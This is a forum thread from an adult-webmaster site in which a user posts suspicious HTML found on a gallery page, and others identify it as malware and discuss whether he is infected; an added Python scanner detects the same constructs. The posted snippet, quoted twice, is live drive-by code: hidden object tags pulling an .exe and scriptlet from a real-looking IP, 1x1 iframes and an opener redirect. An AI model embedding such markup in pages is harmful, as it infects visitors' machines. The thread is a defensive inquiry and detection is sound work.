GoFuckYourself.com - Adult Webmaster Forum


Dirty F 01-12-2006 09:09 AM

Does anybody have a test machine to see what this code does?
 
I checked a gallery and the sec i clicked it my puter started going crazy. It started loading something it seems and took mins before it was back to normal.
I checked the source of the gallery and noticed some odd stuff...

This is the url. DO NOT CLICK IT!
h ttp://195.225.177.38/mind/r001/

And inside i found stuff like:

Code:

<object data="http://195.225.177.38/rnrdnew/str.exe" type="text/x-scriptlet" STYLE=display:none> 
</object> 
<object data="http://195.225.177.38/rnrdnew/strsp2.js" type="text/x-scriptlet" STYLE=display:none> 
</object> 
<iframe src="http://195.225.177.38/rnrdnew/index.html" width=1 height=1 style="display:none"></iframe>

<SCRIPT language=JavaScript type=text/JavaScript>
<!--

      if (parent.window.opener) parent.window.opener.location='http://195.225.177.38/tds/in.cgi?nine';
    //-->
    </SCRIPT>

<iframe src="http://195.225.177.38/mind/st/index.htm" width="1" height="1"></iframe>

Anybody know what all this crap is? I see no signs of infection yet but i think im hit with something.

Also this opened in a new window: ONCE AGAIN DO NOT CLICK unless you're on a test machine.

h ttp://82.179.166.2/default.php?id=83556&c=cHw1J1sN3Jy70Z9v8JLN1D4XJNc RA1u7
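
Added example, not part of the original thread: a static check that lists the constructs visible in the posted snippet (an `<object>` whose `data` is an executable or a scriptlet, hidden or 1x1 iframes, and a script that rewrites `opener.location`) from saved HTML without rendering it. The sample input is constructed and uses a placeholder host (192.0.2.10); the rule names and the `scan` function are this example's own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".hta")
OPENER_RE = re.compile(r"opener\.location\s*=\s*['\"]([^'\"]+)", re.I)

def _hidden(a):
    """True for display:none styling or a 0/1-pixel width or height."""
    style = (a.get("style") or "").replace(" ", "").lower()
    tiny = any((a.get(k) or "").strip() in ("0", "1") for k in ("width", "height"))
    return "display:none" in style or tiny

class DriveByScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # (rule, url) tuples in document order
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)           # HTMLParser lower-cases tag and attribute names
        if tag == "object":
            url = a.get("data") or ""
            if urlparse(url).path.lower().endswith(EXEC_EXT):
                self.findings.append(("object-executable-data", url))
            elif (a.get("type") or "").lower() == "text/x-scriptlet":
                self.findings.append(("object-scriptlet", url))
        elif tag == "iframe" and _hidden(a):
            self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:       # script bodies arrive here as raw text
            for m in OPENER_RE.finditer(data):
                self.findings.append(("opener-redirect", m.group(1)))

def scan(html):
    parser = DriveByScanner()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample shaped like the posted snippet; the host is a placeholder.
SAMPLE = """<object data="http://192.0.2.10/rnrdnew/str.exe" type="text/x-scriptlet" STYLE=display:none></object>
<object data="http://192.0.2.10/rnrdnew/strsp2.js" type="text/x-scriptlet" STYLE=display:none></object>
<iframe src="http://192.0.2.10/rnrdnew/index.html" width=1 height=1 style="display:none"></iframe>
<SCRIPT language=JavaScript type=text/JavaScript><!--
if (parent.window.opener) parent.window.opener.location='http://192.0.2.10/tds/in.cgi?nine';
//--></SCRIPT>
<iframe src="http://192.0.2.10/mind/st/index.htm" width="1" height="1"></iframe>"""
```
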

Dirty F 01-12-2006 09:11 AM

The whois goes to a Ukrainian address. What a surprise.
I see shady shit and Russians are involved. Who would've guessed that.

AlienQ - BANNED FOR LIFE 01-12-2006 09:14 AM

Quote:

Originally Posted by Franck
The whois goes to a Ukrainian address. What a surprise.
I see shady shit and Russians are involved. Who would've guessed that.

What more is there to know?
Someone's PC is forever changed and tainted.

Shoot your Hard Drive.

fris 01-12-2006 09:17 AM

it has an .exe in the object address that should tell you something.

AlienQ - BANNED FOR LIFE 01-12-2006 09:19 AM

http://vil.mcafeesecurity.com/vil/content/v_135733.htm

AlienQ - BANNED FOR LIFE 01-12-2006 09:21 AM

Basically McAfee says you are fucked.

KingK7 01-12-2006 09:22 AM

It will make you convert in 1:7000 with ccbill

AlienQ - BANNED FOR LIFE 01-12-2006 09:23 AM

Quote:

Originally Posted by KingK7
It will make you convert in 1:7000 with ccbill


LOL :thumbsup

Ya think it is a AFF Code swapper? Could be...

chupachups 01-12-2006 09:43 AM

I know what nasty shit this is..... Summary: Pay or format your HD :(

GFX Wiz 01-12-2006 09:45 AM

Quote:

Originally Posted by Franck
I checked a gallery and the sec i clicked it my puter started going crazy. It started loading something it seems and took mins before it was back to normal.
I checked the source of the gallery and noticed some odd stuff...

This is the url. DO NOT CLICK IT!
h ttp://195.225.177.38/mind/r001/

And inside i found stuff like:

Code:

<object data="http://195.225.177.38/rnrdnew/str.exe" type="text/x-scriptlet" STYLE=display:none> 
</object> 
<object data="http://195.225.177.38/rnrdnew/strsp2.js" type="text/x-scriptlet" STYLE=display:none> 
</object> 
<iframe src="http://195.225.177.38/rnrdnew/index.html" width=1 height=1 style="display:none"></iframe>

<SCRIPT language=JavaScript type=text/JavaScript>
<!--

      if (parent.window.opener) parent.window.opener.location='http://195.225.177.38/tds/in.cgi?nine';
    //-->
    </SCRIPT>

<iframe src="http://195.225.177.38/mind/st/index.htm" width="1" height="1"></iframe>

Anybody know what all this crap is? I see no signs of infection yet but i think im hit with something.

Also this opened in a new window: ONCE AGAIN DO NOT CLICK unless you're on a test machine.

h ttp://82.179.166.2/default.php?id=83556&c=cHw1J1sN3Jy70Z9v8JLN1D4XJNc RA1u7

Thanks Franck...we're always looking for shit like this for our test machines. If anyone else has any more, please post or email to [email protected]

Dirty F 01-12-2006 09:47 AM

Quote:

Originally Posted by chupachups
I know what nasty shit this is..... Summary: Pay or format your HD :(


I can't find any signs of infection. I wonder if it failed to install.

Dirty F 01-12-2006 09:48 AM

Quote:

Originally Posted by GFX Wiz
Thanks Franck...we're always looking for shit like this for our test machines. If anyone else has any more, please post or email to [email protected]


Yw...what exactly you do with it?

GFX Wiz 01-12-2006 09:51 AM

Quote:

Originally Posted by Franck
Yw...what exactly you do with it?

Harvest spyware definitions for our anti-spyware application

Dirty F 01-12-2006 09:52 AM

Quote:

Originally Posted by GFX Wiz
Harvest spyware definitions for our anti-spyware application


i see...cool.

chupachups 01-12-2006 09:56 AM

Franck, do you see any disturbing effects of it? Did it change your wallpaper, and you can't change it back etc?

Dirty F 01-12-2006 09:59 AM

Quote:

Originally Posted by chupachups
Franck, do you see any disturbing effects of it? Did it change your wallpaper, and you can't change it back etc?


Nothing so far. I checked the windows dirs. No new files, no changes. Virus scanner didn't pick up anything so far...but who knows after a reboot.

I used FF...maybe that stopped the infection partly.


All times are GMT -7.